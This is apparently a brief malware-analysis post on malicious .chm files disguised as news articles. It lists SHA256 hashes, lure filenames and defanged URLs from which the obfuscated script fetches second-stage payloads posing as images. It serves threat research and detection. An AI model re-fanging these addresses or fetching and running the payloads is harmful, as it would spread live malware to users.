I was bored and found this file with an interesting filename, “22 European Nations Form New .chm”
sha256 : ebec8440590cdea8433079cf2b3f3259694035a9ab80a163f1f0ffcf606939dc
ITW Filename : 22 European Nations Form New .chm
sha256 : c9b26ffb11ba2952afaa3e6a96a7089820366eaaa901240f60b8ca6ccd78beef
ITW Filename : mynakedpic.chm
Alright, it’s slightly obfuscated, we can clean this up.
We can see that it’s downloading the 2nd stage from “hxxp://png[.]realtimenews[.]tk/fssct.jpg”
The hash of “fssct.png” is 61fa14c91f3014baa8ab09056633d1f9311184564ed49e30aba5203ea3071f25
The contents of that file is here: https://ghostbin.com/paste/t79kd
For those who are too lazy to decode it,i have decoded it for you and put it up on https://ghostbin.com/paste/cdkjf
As you can see that it’s downloading from “hxxp://png[.]realtimenews[.]tk/fs.png”
The hash of “fs.png” is “e95cb15d040e95fef37d8c2cec2ccca5914a116784c4d45ebfb94775fcb9a522”
I have extracted the payload and the hash of the payload is as follows.
SHA256 : fb18b8cc28da930ac06cd7494a4e5f69b91da6669586408293ac842dded8d557
We can also see that it’s downloading another Json from “hxxp://news[.]realnewstime[.]xyz/news/us”
The hash of the json file is “210dcb3a084179f7489a43000c04082b7d2c8606c077d44a9d912dbc530d542e”
Within this zip file, there is another malicious chm file.
sha256 : 413ec374a29f8595e2c90d1549968e3d71db0132b5bfa89b4bb301b132216435
ITW Filename : Wood Group in deal to take over Amec Foster Wheeler – News.chm
The payload will require another writeup on it.
We can find other similar samples that are using the same “Load_HTML_CHM0.html”
sha256 : b1d141ed7fcd1051aa756c8ae0658c5c570f64b48c934d4fad246f3eb5ebcf3f
ITW Filename : Bigger Blocks and Smarter Contracts: What's In Bitcoin Cash's Next Fork?.chm
sha256 : 37f2ef8e7cba1523eda0e87d607217100543018cb1ba514974b69244783a3423
ITW Filename : Cloud Giant.chm
sha256 : 1c7075d8c86557ee1d1bee0acd5562370e350ad9b3f1081e2529cfcced0f9593
ITW Filename : 5 More Payments Firms to Adopt Ripple's xVia Tech.chm